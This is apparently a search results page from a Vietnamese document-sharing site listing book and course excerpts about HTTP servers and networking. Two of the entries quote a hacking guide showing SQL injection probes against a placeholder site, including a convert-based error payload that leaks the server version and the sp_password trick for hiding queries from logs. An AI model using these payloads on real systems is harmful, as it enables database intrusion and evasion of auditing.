intTypePromotion=1
ADSENSE

Building http servers

Xem 1-9 trên 9 kết quả Building http servers
 • IN 1995, WHEN I WAS IN MY SECOND YEAR IN COLLEGE, I was introduced to UNIX network programming. In C, you could create sockets to open TCP connections to servers and code the servers that accepted these connections. I remember the excitement I felt the fi rst time I created a TCP server: I could accept connections and receive and send messages on them. If I wanted my server to accept many concurrent connections, the common solution was to use threads, and soon I had created my fi rst multi-threaded TCP server.

  pdf0p hotmoingay3 09-01-2013 73 13   Download

 • Writing data applications is tricky in any language, but coders committed to JSP will find a welcome side-kick in Pure Java Server Pages. The handy volume is about two-thirds code and one-third reference. Code near the beginning serves to illustrate crash courses in servlets, JavaBeans, JDBC, and JSP concepts, while the rest of the coding section plunges straight into building a shopping cart, sending JavaMail, and much more. The final third of the book is a syntax reference for the javax.servlet.jsp, javax.servlet.jsp.tagext, javax.servlet.package, and javax.servlet.http packages.

  pdf235p tailieuvip14 26-07-2012 76 36   Download

 • Nếu bạn đang sử dụng một trong các máy chủ web được liệt kê trước đó trên một máy tính có tên yourserver, và bạn phải đăng ký một vị trí đường dẫn ảo có tên yourpath để trỏ đến các lược đồ cơ sở dữ liệu mà bạn tạo ra các thủ tục PL / SQL trước, bạn có thể yêu cầu trang thông qua một trình duyệt web (hoặc bất kỳ chương trình có khả năng thực hiện một yêu cầu HTTP)

  pdf89p myngoc6 07-10-2011 41 5   Download

 • Kiểu ví dụ chọn một chuỗi giá trị cho một biến urlBase của: http://foo.com/SomeService và một chuỗi giá trị cho một biến urlArgs của công ty = tại & t / mobilcom, trong đó có một số không gian, một ký hiệu, và một dấu gạch chéo. Để kiểm tra sự chuyển đổi này ví dụ, bạn có thể sử dụng bất kỳ tập tin XML như là nguồn gốc và hãy thử như sau:

  pdf89p myngoc6 07-10-2011 34 4   Download

 • Tất cả ba bộ vi xử lý sản xuất đầu ra sau đây giống hệt nhau: http://foo.com/SomeService?company=at% 20% 26% 20t% 20% 2F% 20mobilecom Chúng tôi có thể viết một tờ kiểu dáng liên quan đến chức năng mở rộng trong không gian tên khác nhau (chỉ trong đó, chúng tôi đang mong đợi để được sử dụng bởi các

  pdf82p myngoc6 07-10-2011 40 4   Download

 • This course provides students with the knowledge and skills they need to build applications that exchange data with Microsoft® SQL Server™ in Extensible Markup Language (XML) format. The course covers the XML-based features of Microsoft SQL Server 2000, including XML-based enhancements to the T-SQL language; generating results in XML format; using query templates; configuring SQL Server for Internet/intranet access; publishing SQL Server data on the Internet by using the HTTP protocol; XML data access by using Microsoft ActiveX® Data Objects (ADO) 2.

  pdf12p thuyvan 12-08-2009 96 10   Download

 • ECE/CS 372 Introduction to Computer Networks Lecture 1: Chapter 2 Application Layer Principles of network applications, Web and HTTP, FTP, Electronic Mail, DNS, P2P file sharing, Socket programming with TCP, Socket programming with UDP, Building a Web server.

  ppt107p dunglh2013 05-04-2014 49 2   Download

 • Xâm nhập máy chủ Ms-Sql qua lỗi Sql-Injection & Cross-Database PHẦN I: CÁC KĨ THUẬT HACK TRONG SQL • sql-injection • convert-magic • cross-database PHÁT HIỆN LỖI SQL-INJECTION http://www.company.com/product/price.asp?id=1 select price from product where id=1 http://www.company.com/product/price.asp?id=1’ select price from product where id=1’ Unclosed quotation mark before the character string ‘ http://www.company.com/product/price.asp?id=[...] KĨ THUẬT CONVERT-MAGIC http://wwww.company.com/product/price.

  pdf6p tt1991tt 20-02-2011 839 74   Download

 • http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version) --sp_password select price from product where id=1 and 1=convert(int,@@version)--sp_password Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int. 'sp_password' was found in the text of this event.-- The text has been replaced with this comment for...

  pdf6p mrduonganhtuan 16-02-2011 181 49   Download

CHỦ ĐỀ BẠN MUỐN TÌM

ADSENSE

p_strKeyword=Building http servers
p_strCode=buildinghttpservers

nocache searchPhinxDoc

 

Đồng bộ tài khoản
2=>2